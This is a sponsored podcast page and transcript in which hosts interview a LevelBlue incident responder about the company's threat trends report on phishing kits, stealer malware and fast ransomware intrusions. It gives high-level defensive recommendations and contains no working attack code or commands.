Phishing, malware, and ransomware attacks are becoming faster, easier, and more damaging—and Kenneth Ng from LevelBlue breaks down exactly how and why. This episode reveals the latest threat trends and what organizations can do right now to defend against them.
LevelBlue’s latest Threat Trends Report pulls no punches: phishing, malware, and ransomware attacks are not just continuing—they’re accelerating. In this episode of ITSPmagazine’s Brand Story podcast, hosts Sean Martin and Marco Ciappelli are joined by Kenneth Ng, a threat hunter and lead incident responder on LevelBlue’s Managed Detection and Response (MDR) team, to unpack the findings and recommendations from the report.
Phishing as a Service and the Surge in Email Compromises
One of the most alarming trends highlighted by Kenneth is the widespread availability of Phishing-as-a-Service (PhaaS) kits, including names like RaccoonO365, Mamba 2FA, and Greatness. These kits allow attackers with little to no technical skill to launch sophisticated campaigns that bypass multi-factor authentication (MFA) by hijacking session tokens. With phishing attacks now leading to full enterprise compromises, often through seemingly innocuous Microsoft 365 access, the threat is more serious than ever.
Malware Is Smarter, Simpler—and It’s Spreading Fast
Malware, particularly fake browser updates and credential stealers like Lumma Stealer, is also seeing a rise in usage. Kenneth points out the troubling trend of malware campaigns that rely on basic user interactions—like copying and pasting text—leading to full compromise through PowerShell or command prompt access. Basic group policy configurations (like blocking script execution for non-admin users) are still underutilized defenses.
Ransomware: Faster and More Automated Than Ever
The speed of ransomware attacks has increased dramatically. Kenneth shares real-world examples where attackers go from initial access to full domain control in under an hour—sometimes in as little as ten minutes—thanks to automation, remote access tools, and credential harvesting. This rapid escalation leaves defenders with very little room to respond unless robust detection and prevention measures are in place ahead of time.
Why This Report Matters
Rather than presenting raw data, LevelBlue focuses on actionable insights. Each major finding comes with recommendations that can be implemented regardless of company size or maturity level. The report is a resource not just for LevelBlue customers, but for any organization looking to strengthen its defenses.
Be sure to check out the full conversation and grab the first edition of the Threat Trends Report ahead of LevelBlue’s next release this August—and stay tuned for their updated Futures Report launching at RSA Conference on April 28.
Learn more about LevelBlue: https://itspm.ag/levelblue266f6c
Note: This story contains promotional content. Learn more.
Guest: Kenneth Ng, threat hunter and lead incident responder on LevelBlue’s Managed Detection and Response (MDR) team | On LinkedIn: https://www.linkedin.com/in/ngkencyber/
Resources
Download the LevelBlue Threat Trends Report | Edition One: https://itspm.ag/levelbyqdp
Learn more and catch more stories from LevelBlue: https://www.itspmagazine.com/directory/levelblue
Learn more about ITSPmagazine Brand Story Podcasts: https://www.itspmagazine.com/purchase-programs
Newsletter Archive: https://www.linkedin.com/newsletters/tune-into-the-latest-podcasts-7109347022809309184/
Business Newsletter Signup: https://www.itspmagazine.com/itspmagazine-business-updates-sign-up
Are you interested in telling your story?
https://www.itspmagazine.com/telling-your-story
[00:00:00] Sean Martin: Marco,
[00:00:01] Marco Ciappelli: Sean,
[00:00:02] Sean Martin: it's uh, story time.
[00:00:04] Marco Ciappelli: I know it's the, my favorite time of the year. Well, of the day. 'cause at lately we do stories every
[00:00:10] Sean Martin: do many stories all the time, but, uh, they're super fun. And you know what I like about this particular type of story?
[00:00:19] Marco Ciappelli: uh, tell me
[00:00:20] Sean Martin: I'll tell you 'cause you're not gonna be able to guess. Well, I've always wanted to be an analyst,
[00:00:25] Marco Ciappelli: Oh yeah,
[00:00:26] Sean Martin: to be an analyst 'cause I like to
[00:00:27] Marco Ciappelli: you play one on on podcast?
[00:00:30] Sean Martin: I like data, I like to analyze data, I like to look at trends and, and kind of see where things are going.
And
[00:00:35] Marco Ciappelli: You do?
[00:00:37] Sean Martin: that's exactly what we're gonna be talking about today. Uh, the threat trends report from, uh, level blue. So I'm, I'm super fun, excited for this.
[00:00:45] Marco Ciappelli: Very good. And we have can that
[00:00:48] Sean Martin: Ken Ang from Level Blue, uh, who I guess has a, has a bit of a hand in putting this report together. I'd say.
[00:00:57] Kenneth Ng: Yeah, I did. So, hi, [00:01:00] my name is Ken. I'm here with Level Blue. I'm a threat hunter and one of the lead IR folks on our managed detection and response team. So Level Blue, we're a managed service provider, managed security service provider. We do cybersecurity consulting, and we also have a threat intelligence team alongside our 24 7 365 soc. Um. Basically we saw that we had a lot of data from our years of work, uh, from both threat hunting, from all the incidents we help out on, and then obviously, uh, from our SOC and then working hand in hand with our level Blue Labs team. And they do kind of threat analysis, threat hunter tracking all the really cool stuff on the backend versus like us being wore tactical boots on the ground.
We just sat down like, Hey, we need to come up with a report. We need to be thought leaders in the field, and we hammered out a first edition of our 2024, second half of the year of [00:02:00] report. The threat trends report.
[00:02:03] Sean Martin: So I'm gonna, gonna start here. Um, maybe a little, a little technical, but I think it's interesting 'cause it threat intelligence, threat hunting, security operations, managed detection response. I. Lots of different types of data, right? Some of it looks the same, repetitive others. You're, you're trying to make sense of something that might look, be an anomaly sitting, uh, hidden within another data set.
How, how do you, how do you and the teams look at all of this to kind of figure out what do we collect, how do we normalize it? How do we bring it all together?
[00:02:42] Kenneth Ng: Yeah, I think when we go through our incidents kind of, we start that as our starting point, right? We, we see in many incidents per day. And we drilled down to, Hey, what are the types of incidents we're seeing and how does this align with the findings of the Labs team? [00:03:00] So I think a good example from this of the report is the labs team started doing a lot of threat actor analysis on phishing as a service kits, in this case, raccoon 365, and this is just one of many.
This is a drop in a bucket of all the many new phishing as a service kits that we're seeing come up and being our. Is affecting our, our customer base. So we see that as a trend both in our SOC metrics and as threat hunters as we're hunting through, Hey, what phishing as a service kits are we seeing across the theater sources?
What are our SOC seeing helping customers out with? And how does this align? With, uh, what the labs team is seeing on the dark web and third actor analysis. So we're taking these pieces of, Hey, what aligns? And in this case, uh, this led to kind of three kind of key points in our, in our report, which is essentially phishing is up, phishing is up big time, and number two is malware is up big time.
And number three, [00:04:00] ransomware actors are working faster and they're getting deeper within environments.
[00:04:05] Marco Ciappelli: So many good news.
[00:04:06] Sean Martin: Right. Loads of good news there. Well, we'll dig into each of those. Um, we, so there's the, the inaugural version of this. Is there an objective beyond just, we have a bunch of data. We're gonna see what it says is, is there an objective to, I guess, how, how do level Blue customers take advantage of, of what you have put together here?
What,
[00:04:35] Kenneth Ng: Yeah, I think it's beyond just, we're not just throwing a whole bunch of numbers and data points. That's not the point of the report, at least in not, uh, the sections I wrote. Uh, we wanted to make sure that there are actionable. Pieces in the report that a customer, or even just anyone else that's not a customer who potentially could be looking for, Hey, what are some recommendations or changes we can make to be more secure, to have more [00:05:00] secure, uh, defense in depth within our organization.
So we made sure for each of those three pieces, those three highlights, that we also have recommendations, Hey, how do we defend against phishing? How do we defend against malware attacks? And in the scope of, uh, ransomware actors, like, how can we. Make the right changes within our environment. How can we detect with the threat actors?
And then when a incident does happen, how do we remove the threat actors, uh, from the environment, the containment and remediation piece.
[00:05:27] Marco Ciappelli: And I wanna add to that, that I, I am already aware and I'm not gonna just spill the beans that you're already planning for a part two. Uh, the, the revenge of the threat report. So obviously it's, it's, it's becoming core for level blue to to be something that you're gonna leverage moving forward and definitely bring benefit to your clients.
[00:05:52] Kenneth Ng: Exactly. We wanna be a thought leader in this space. Uh, we don't wanna simply just have data. We want to help our customers. We wanna help. [00:06:00] All the other vendors and partnerships that we have and potential partners and vendors that wanna work with Level Blue, we wanna show that hey, we are not afraid to a go in the weeds to discuss in, in this level of detail of what we're seeing, but also how we're detecting how we're helping our customers.
And this just makes the field as a whole stronger and better and more cohesive.
[00:06:22] Marco Ciappelli: All right, so let, let's dig deeper. Start number one.
[00:06:26] Sean Martin: RAC raccoon number
[00:06:28] Kenneth Ng: Uh, yeah, I mean the, the hypo, not the hypothesis, but the thesis statement here is that phishing is up and why is phishing up? Right. Phishing has always been around for, you know, the genesis of cybersecurity, and I think the big finding here is that email account takeover attacks. Are becoming very easy for threat actors to perform.
You have a zero knowledge threat actor who can just simply buy a kit. In this case, in our report, we dis we discussed, uh, [00:07:00] raccoon 365, but there's also other kits that we've been seeing. Mamba two fa, uh, tycoon Greatness. Uh, all these are re readily available. Cheap. All you need to do is just give them credit card, some crypto boom.
You have the backend infrastructure, you have the phishing kit itself. You just put in the targets, you click send. It creates the emails. It sends the emails to your victims. And from there, uh, these kits are relatively simple, right? You have a fake invoice. You have a fake, Hey, we just shared this. Follow with you.
We're seeing. You know, previously everyone's talking about two FA for protections against these account takeover accounts, um, attacks from phishing. And the problem is all these kits now incorporate a two FA proxy where it proxies your connection to the Microsoft backend. You put in your MFA credentials and you get a.
Session token, that the attacker gets a session token, and then the attacker [00:08:00] then uses the th uh, session token to get into your environment. So
[00:08:04] Sean Martin: you're, you're not actually, your session token is not actually being used by you. You are handing it off to the,
[00:08:10] Kenneth Ng: You're handing it off to the attacker and then they're using it to get into your environment. And there's also a lot of, I guess, gaps in security, what we see across both customers and what's being discussed, uh, by other vendors. Right. Um, a big good example is app consent. You know, as a end user. You're able to consent to apps to be added to your O 365 account.
So we're seeing threat actors leverage apps that let you very quickly xFi out your entire mailbox or to jump into SharePoint and pull out, uh, as many files as they want, right outta SharePoint. So then this becomes a problem because. It's downstream attacks, not that you're, you're worried about. This is where email account takeover accounts attacks, sorry, lead to business email compromise.
And this is where you have Aach H scams. Uh, this is where you have [00:09:00] downstream attacks where your three C five credentials or your Azure AD credentials that come in for the VPN. So now you're not just looking at a phishing attack that led to a email compromise. You're, you're looking at a phishing attack that led to potentially full, uh.
Enterprise compromise through a ransomware actor.
[00:09:19] Sean Martin: Uh, so, so many questions on this first point because obviously there's, there's the entry into, into the organization through a system or a device or, uh, an end user clicking on something. And there's, uh, the detection of that. And then there's the other stuff you're talking about, which is now the, the, uh, the.
There's a compromise, right? And lateral movement and, and installation of additional things can take place. Are there signs of those activities that can be identified and used to block [00:10:00] and if not, how do, how do organizations how, with the after effect of a compromise, if it, if that is indeed successful in terms of like response and recovery and things like that?
[00:10:12] Kenneth Ng: Sure. That's a, a very multifaceted question, Sean, but
[00:10:16] Sean Martin: I like to do that, by the way.
[00:10:17] Kenneth Ng: we're hitting many different pieces of it. Right. Just talking about the phishing aspect. Right. Uh, the first piece of that is the a have a strong email gateway. Right. That was. Filter out a lot of the fil phishing emails that come in. Kind of stop the attack before you even get to the downstream.
Uh, user compromise. Um. It's talking about having good conditional access within your O 365. It's talking about the app consent, um, having only admins allow for consent consenting of apps. It's talking about having the logs come to a sim, right? So that, you know, organizations such as Level Blue can then analyze and say, Hey, we have these.
We have the telemetry, we [00:11:00] have the rules that detect, uh, the attacker activity. Um, very common attacker activity when they enter a mailbox is to create a mailbox rule, right? So it's how do you have the logs to even detect that in the first place? Do you have the teams to do that? So that's the first piece of it.
Second piece of it is, do you have someone looking at the logins, right? So you have a suspicious or anomalous login from most likely a IP address that's not from your normal users. So do you have the tools to detect those anomalies? You know, whether that be machine learning or just hard TTPs. Analysis of, hey, this usually usually comes in from an American IP address and all of a sudden we're seeing a Russian IP address.
So that's sort of the, the first piece of the puzzle. That phishing, assuming that's the, you know, first intrusion method. And we referenced this as a report, but phishing is just one small piece of the intrusion puzzle. Right. We also have. The discussion of malware with the discussion of [00:12:00] exploitation of devices in the DMZ.
You know, most of the time this is, uh, the VPN concentrator, this is the, uh, firewall entry point. Or this could even be a FTP, um, box that's readily accessible. And we saw that recently with Crush FTP, so Really? Oh, sure. Mark
[00:12:17] Marco Ciappelli: no, no. I, I was thinking like, when, when you gave the three main point and, you know, you gave the, the good news, malware, ransomware, and, and phishing, they're all up and I'm thinking like they're probably the same reason, right? I mean, automation, uh, malware as a service and, and, and, and all of that. And, and it is kinda like more of deciding, Hmm, which.
Which tool am I gonna get in this nice bag that I can purchase, even if I don't know anything about hacking?
[00:12:48] Kenneth Ng: right. And it's, it's kinda unfortunate, right? There's no one tool that captures. All of these, right? Both the phishing piece, the the ransomware piece or ext stringently, the. [00:13:00] The malware piece and it's about having the right partnerships and vendors in place. So, you know, speaking as a lovable employee, obviously we do that full suite, we do partnerships with Central one for EDR, we do the email analysis.
We have our 24 7 soc. But speaking as a security practitioner, generally you wanna choose a vendor and a partner that aligns with business needs and budget and all of that.
[00:13:25] Sean Martin: And one, one thing, Ken, if I can, because. When we, when we look at response in particular, um, it, it's often the time between compromise and recovery, right? Or at least blocking or, um, yeah, stopping the, stopping the spread, and then ultimately recovery. Um, it sounds like the, the bad actors are. Orchestrating using these tools, a lot of the tactics and techniques and automating a lot of that stuff.
So those times are just super fast now, making it even more [00:14:00] difficult for response teams to, to, to close that gap of, of compromise to damage. Um, is that the case? Are there data points supporting that? And, and how do organizations kind of handle that scenario?
[00:14:15] Kenneth Ng: Yeah, so across the ransomware incidents I've worked in the last couple of months we're seeing breakout time. So from time of compromise to lateral movement that used to be within days, we're now seeing that within an hour. So sub one hour intrusion, you know, weather through what we discussed, through phishing, through malware, through exploiting the DMZ. Or through, uh, what we often see is the fake IT support, where they call in, get a user on Teams, and then they'll use, Hey, open Quick Assist, which is pre-installed on all your hosts from that intrusion point. It's sub one hour to laterally move, and nine times outta 10, they're moving on to a server that.
Usually [00:15:00] contains other admin administrative credentials, and that leads to full domain pop. So threat actors are doing this very quickly, right? They're using some level of scripting automation. Uh, they run their scripts. Uh, and in the case of one case study we've done, the customer, they had a user fall for the tech support scam user opened the file that was sent to them through the app. From there, everything was automated from both the execution, the DLL side loading that allowed for the escalation of privileges on the DLL and then the brute forcing and SMB uh, attacks to get additional administrator credentials. So all that. We saw within 10, 10 minutes tops with scripts that didn't have any mistakes.
It was just blast, blast, blast. And we see this in our sim so we know that piece of it is definitely automated and scripted. Um, they have it down to a T And really the defensive measures [00:16:00] there is a, to not have your users fall for phishing, not have your users fall for the Microsoft teams attacks, right?
So that's where you have to really figure out your threat surface, right? If you're using Microsoft teams. Do you have external domains able to reach in? Right? Do you, or do you have a whitelist approach that only allows trusted domains to come in? If, uh, your major intrusion point is users running malware, downloading software?
Do, are you using, uh, whitelisting of applications? Are you using tools like app blocker to not allow certain executions of files? Right. Threat actors often rely on the same con of files across our attacks. Um, this is reconnaissance tools like net scan, uh, an angry IP scanner. We see them use the same kind of tools for. Enumeration, right? So does the end user need access to these tools and nine times outta 10 it's no, it's, it's your admin users that really [00:17:00] need these tools. Another example is RMM Tools. Well, you're likely just gonna be using one RMM, so remote management and. Monitoring tool. So this could be your screen connect, this could be your team viewer.
Well, threat actors are dropping 2, 3, 4 RM tools to keep persistence on your servers, on your end user workstations that they pop. And this is another case where, hey, you can preemptively block those RMM tools and their API endpoints, so the domains that they need access to, to act for the program to actually run.
So by taking that preemptive step. You're making it much difficult, much more difficult for a fraud actor to do their job of A compromising users, but b, laterally moving across the environment and I guess
[00:17:44] Sean Martin: they're, they're automating the reconnaissance and then using the results of that to,
[00:17:49] Kenneth Ng: yeah, and that piece.
[00:17:50] Sean Martin: the actions and the movement itself. Yeah.
[00:17:53] Kenneth Ng: itself is a a bit manual, right? You need to be able to, Hey, I now have these creds to then do this on the domain [00:18:00] controller. But a lot of the spread we do see, hey, this could be scripted, right? They're just using WIN rm. They're using PS exec to just beam a installer.
Nine times. Like I said, it's the RM tool. You beam it on the domain controller. Now you have a remote desktop tool on your domain controller and your domain controller. Even if for the most part you have the network controls pretty down pat, you allow 4, 4, 3 out, it needs to pull Windows updates, right? Bam.
That's all it needs to for them to get back in on that remote access tool on your domain controller.
[00:18:32] Sean Martin: There goes
[00:18:32] Marco Ciappelli: the situation in like, I, I'm always fascinated by, you know, the, the, the never ending fight between good and evil, right? So something in innovates on the defense side, something innovates on the offensive side and so on. So in, in this scenario. Um, there is a lot that can be done, um, preventing this from happening, but do we have [00:19:00] technologies that are fighting automatically without the auto, against the automation of the attacker?
[00:19:10] Kenneth Ng: That's a good question. It's uh, it's not something I have seen. I know it's something our level Blue Labs team is kind of working on using, you know, generative AI and machine learning to better detect that activity. That's something we are trying to get ahead of, but I think just speaking as a practitioner, just speaking as myself, it's, it's a tough fight.
[00:19:32] Marco Ciappelli: Right. Yeah.
[00:19:34] Sean Martin: And. In terms of, of, uh, malware. 'cause that's kind of the second, second block of stuff. We've, we've kind of talked in and around us, but, uh, any highlights from, from there that you want to point to? And what do, what does some of those results mean to organizations trying to defend themselves?
[00:19:57] Kenneth Ng: Yeah, sure. So on our 2024, which is [00:20:00] what the trends report, uh, covered, we saw a lot of cobalt strike. And that's a given, that's a very readily available tool for threat actors. But I think for me, more interesting was the uptick in both fake updates. Uh, this is where you usually visit a compromise site. It runs some JavaScript.
It says, Hey, you're running an out of date Chrome. Please download this file, and you're gonna, users, end users end up downloading a zip file, and inside that is a JavaScript file. Uh, I think this comes down to poor control, uh, and GPO where you're just letting Willynilly users double click on executable script files and it just runs for end users.
Uh, the best defense against this is to use GPO to set Hey. WSF files, JavaScript files, files that end users have no business running. Have that open a notepad, makes it completely useless as a threat vector. And the second attack, we're seeing a lot of, um, it's luma Steeler, it's also referenced in the [00:21:00] report, but just in the last week we had seven luma uh, detections.
And this is where you'll visit a website or you'll open a document and it says, Hey. Your browser does is wonky. Please copy and paste this code. So, and the website, you click the copy button, uh, it uses JavaScript to put stuff into your clipboard. You paste it, it says, all we're doing is it. All it does is I'm a human. Really, you copied a bunch of PowerShell that's now gonna pull down, you know, additional files plus the cute little, I'm not a robot, so we've seen seven of these in the past week. Users are prone to fall for it, right? It's, it looks like it could be a capture. It looks as a, as pictures to it. It looks fancy, it sounds legit.
Um, and I think. This one is easy enough. You just don't allow users to run PowerShell unless they're a power user. Um, don't let them open command prompt. You know, you still need command [00:22:00] prompt on the backend to run, you know, updates and controls for your user workstations, but at the end, users themselves, under their account should not be able to open a command, prompt paste in commands, and then get compromised in that way.
So that, that's a really good finding. We've had, uh, both last year and this year.
[00:22:17] Sean Martin: So for, for group Paul, you've mentioned this a few times, GPO Group policy orchestrator, that is, that something organizations aren't using. I'll say well enough or effectively enough.
[00:22:33] Kenneth Ng: Um, I would say
[00:22:35] Sean Martin: seems like a tool that, that, that exists in the environment that maybe just a bit of understanding of how your, what your policies are and being a little more prescriptive and, and how you control things might be
[00:22:46] Kenneth Ng: there's a level of complexity there, right? I feel like if everyone had the mindset of, oh, I'm gonna leverage GPO to protect my organization, we wouldn't have as many compromises. I'm not throwing customers [00:23:00] or organizations that been compromised on the
[00:23:01] Sean Martin: of course not.
[00:23:02] Kenneth Ng: bus, right? Like there's. The, the threat actors are getting better, they're having more novel techniques that, which means as defenders we need to go in and make these prescriptions of, Hey, go into your GPO and do this, or you need to enable these kind of rules in your EDR.
Um, the malware's easier to use for the threat actor. It's easier to compromise systems. There's more zero day exploits, right? But at the same time, I think there's what I call the three A's, uh, in. Cybersecurity orgs, and that's apathy, apprehension, and acquiescence. So you have this apprehension to make these changes, right?
You don't want to take down the system, you don't want to make those patches, right? That could take down the business. You have a bit of apathy and that, hey, we haven't been compromised yet. Maybe we're already doing the right things. When we see a, a good example is when we see A DMZ compromise. Usually you're thinking zero day, you're thinking, I'm running the latest [00:24:00] version.
I got Popeye zero day, no, nine times outta 10. You go in, oh, you're running a version That's a year behind. Right. It happens to have been a zero day, but it impacts, you know, many versions back. And I think that acquiescence piece is really, everyone thinks they're gonna get popped and what's the worst that can happen if you get popped, if you have cyber insurance?
And I think the problem with that line of thinking is that once you've been compromised, threat actors now have all this information. They have how your usernames are. Like they have all the IP addresses of your VPN, your internal, you know, domain. They have hashes, they have usernames, they have file structures.
They now can tell other threat actors, Hey, I easily got into these guys. Um, they might make changes, but I bet you these usernames still exists or they still allow, you know, this kind of policy.
[00:24:53] Sean Martin: Oh, they, they'd never share that information. Come on.
[00:24:57] Marco Ciappelli: So this level of [00:25:00] complexity, like, I mean what you're describing it, it really requires some serious size teams too. To think all this over. And of course, that's the role of the vendors, that the role of, you know, the cybersecurity professionals and, and the tools that are used to make things a little bit more approachable.
So can you show us, like, give us some good news of maybe case studies where successfully this could have been mitigated.
[00:25:35] Kenneth Ng: Yeah, I think we've, we've worked with a number of customers that get compromised, right? Our, our team provides, my team, we provide 10 hours of ir. I. To each of our MDR customers. Um, and that gives us a lot of time to provide guidance and recommendations. And I think a really good example is a customer we had that are repeatedly targeted by the same threat actor, [00:26:00] uh, in this case, black bass, unknown ransomware gang in this case.
They've been a little inactive last couple of weeks, almost month now. But some of the. TIPS we've provided to them have actually made the threat actor pivot multiple times. Uh, one of the first examples when we saw, first saw 'em get compromised through the Microsoft Teams rec, um, fake IT support attack, we told 'em, Hey, you need to do a white listing approach and you need to remove quick assist.
So they took that action and the threat actor realized they were no longer able to come in that way and started doing phone calls. Um, so that that's showing that we're working around the threat actor. We're making changes that makes the threat actor's lives more difficult. Um, in this case, that first incident also taught us, uh, some of the actions a threat actor was doing to do DLL side loading to execute their malware.
Uh, in this case, from seeing that [00:27:00] incident, we were able to create custom rules within the EDR. Bam, the next incident, we saw that. So the threat actor, yes, they were able to call up a user, get the user to download a separate tool, but now we saw the alarms trigger for a downstream activity. So I think it's not specific to level blue like the Ven, the cyber vendors in general are getting better because we're seeing such an uptick in activity.
I think the problem is there's still so much to be done. On the customer side, but in terms of like detections and the things that we can do as a vendor, we're, we're definitely trying to be one step ahead. I dunno if that quite answers your question, Marco. It's, it's a bit of good news for us that we can, you know, see
[00:27:46] Marco Ciappelli: No, no, it, it does,
[00:27:48] Kenneth Ng: but it, there's still a lot to be done.
[00:27:50] Marco Ciappelli: Yeah. Like just the idea to know that there are the tools available and, and, and you know, then, then it's a matter of get this tool and. [00:28:00] Execute what you've been told to do as even as a consulting level. Um, and that's a good example of, Hey, do this and do that. And all of a sudden you're mitigating somehow the
[00:28:11] Sean Martin: Yeah. Well, I think, I think this is an important part of the conversation is that most organizations can't scale that. Task or that activity or whatever on their own. and they need help from, from the likes of level Blues that have a lab team and a SOC team and a detection team and, and research teams that. Kinda analyze all this stuff to, to map out all these different paths, right? And there, there's gonna be some com commonality across the, the paths there are gonna be some unique paths taken, unique tools used and things like that. But for, for your team, Ken, to, to come together and, and provide this information to organizations, I think is super helpful.
'cause that, that does scale right? Do it, do it once and help many [00:29:00] is an important piece.
[00:29:02] Kenneth Ng: Yep. And we're trying to, and that, that's why, you know, we have the report, we have level blue blog posts. Uh, we, we talk about what we're seeing and how to take the steps. Um, we also have a customer engagement team. So for our MGR customers, as we have these findings, it's communicated to all the customers.
So just because we helped one customer in this incident doesn't mean there isn't lessons learned that could be implemented for customers across our fleet. And for those who come, come to our website and read our blogs and. We're, we're trying to make the cyberspace a better and safer spot, and that's what Level Blue is trying to, trying to do.
[00:29:39] Sean Martin: absolutely. What, um, clearly you didn't stop, uh, collecting and monitoring, and, and Mark alluded to, you're, you're working on a new one, uh, for 2025. Um, obviously not a complete set for 2025 yet, but initial, initial view of what you're seeing is still in [00:30:00] line with. 20, 24 or any, any big things stand out to you.
[00:30:06] Kenneth Ng: Yeah, I would say it basically aligns, we're still seeing phishing. Uh, we had, I think, seven business email compromise attacks, uh, this past week. We had four malware attacks and two ransomware attacks, so the data aligns. I think we wanna be more forward thinking with the 2025, uh, H one, uh, report. We wanna make sure we hit on some of the future trends that we, I.
Might see, uh, I think there's definitely gonna be a deeper discussion on some of the malware we're seeing and how to protect against those. Uh, our labs team is working hard to track the threat actor infrastructure for the phishing kits on the, on the malware we're seeing, and I, I, I see it being more the same, but we, this being a second iteration, we now have a better idea of how to frame. Kind of the ideas and the data we're seeing how to better [00:31:00] convey it and more importantly, make the right recommendations for customers. Regardless of the breadth and size of their teams, there's gonna be recommendations that, you know, even, uh, mom and pop with one IT guy can make to, to better secure their environment.
[00:31:14] Marco Ciappelli: Yep. 'cause you guys have the trend report, but also you have the futures report and that's gonna come up soon, right? April 28.
[00:31:23] Kenneth Ng: 28th at RSA.
[00:31:25] Marco Ciappelli: Yeah.
[00:31:25] Kenneth Ng: very exciting time, please. Uh, definitely it's gonna be on level blue.com. And speaking of RSA, actually our labs team is actually gonna have a very exciting presentation on the usage of residential proxies by threat actors. So look, look forward to seeing that.
[00:31:41] Sean Martin: That sounds fun if you're a nerd like me and or, or, or a defender practitioner. Um, well, Ken, it's been, it's been great chatting with you. Is there anything else that we wanna highlight? I guess the thing that always [00:32:00] strikes me is ransomware is still a thing. I don't know. It's been, I don't know how many years now we've been battling this.
Do, do you see that we're able, are we able to get ahead of it at some point? What do you think?
[00:32:15] Kenneth Ng: Uh, I think speaking as a practitioner, as long as there's gonna be vulnerabilities and as long as there's gonna be money to be made. Through the ransomware attacks, uh, until we have quantum computers breaking encryption, uh, there's always gonna be ransomware, there's always gonna be threat actors. Uh, it's just about how well you can defend, detect, and prevent.
So,
[00:32:38] Marco Ciappelli: And you know what? There are also always gonna be humans and social engineering. And,
[00:32:44] Sean Martin: hope
[00:32:45] Marco Ciappelli: I mean, we, we changed the,
[00:32:46] Sean Martin: but the humans. Anyway.
[00:32:47] Marco Ciappelli: yeah, well we changed the name. We bring it to the digital world. But these are things that, you know, ransom. That existed before. We call it ransomware, you know, it's, it's, it's just, it's kind of, [00:33:00] I don't wanna be negative, but it is kind of what, part of how our society is made and it just replicated and amplified probably through the digital world and the fact that we're all connected and, and the level of complexity.
And you can just go and knocking door to door and, and trick someone. You just do it in a mass scale. And, uh, and I think, I mean, I, I would love to see one of your next reporters say, Hey, it got, uh, it's not trending up anymore, but I don't know, man.
[00:33:30] Kenneth Ng: I, I am not sure, we'll, I'll ever end up writing that as a sentence, but, uh, do look forward to our next trend report. We're aiming for August timeframe. We're trying to do these bi yearly, but Marco, you'll be the first person I reach out to If, Hey, ransomware's down 50%,
[00:33:45] Marco Ciappelli: me know, let me know. But, but you know what the other thing is, as this is trending up, um, and is not probably gonna end, there's also true. That company like Level Bull are always gonna be fighting the good fight [00:34:00] and they're always gonna do the best and do research and look at the past, the present and the future and, and try to mitigate all of this.
And that's, that's, honestly, if that's all we can do, I think it's, it's pretty damn good.
[00:34:13] Sean Martin: Yeah. Well it's, it's super important. Marco, you and I share, I don't know if you saw, but we, we share a friend that. That wasn't directly impacted, but uh, dialysis machines. Dialysis machines were compromised for ransomware.
[00:34:26] Marco Ciappelli: Yep.
[00:34:27] Sean Martin: Um, that is pretty close to home, to, uh, physical life. Right. So, and, and, and, and a friend as well.
So, uh, this is important stuff and I'm. Thrilled that Ken and you and the team are, are working hard at finding a way to, uh, to mitigate this stuff, even if we can't prevent it from happening. Uh, there'll always be, always be those people out there, but if we can arm the organizations with information and knowledge and tools and, and, uh, bit of support from your team as well.
I think we're in, we're in better shape, [00:35:00] so
[00:35:00] Marco Ciappelli: Yeah, so little memo here, uh, in the notes that will be linked to get to the, the report, uh, that we just discussed. And then of course, stay tuned for the future report to be released, uh, on April 28th. And, uh, and also stay tuned for the next. Trend report, which will be released around, we don't know yet exactly the date, but around August time, you know, 'cause you know everything but, well, Ken, that was great.
I've really enjoyed it.
[00:35:31] Sean Martin: Fantastic chat. Yep. Appreciate it and everybody listening and watching. Uh, thanks for joining us for this, uh, brand story here on ITSP magazine with the level team, blue level blue team, I should say. uh, of course, please do subscribe and share with your friends and, uh, coworkers and colleagues and others in the industry.
Uh, help us all get ahead of this, uh, trend that's not, uh, not stopping. It seems so. Thanks everybody. We'll [00:36:00] talk to you soon.
[00:36:01] Marco Ciappelli: Thank you, Ken.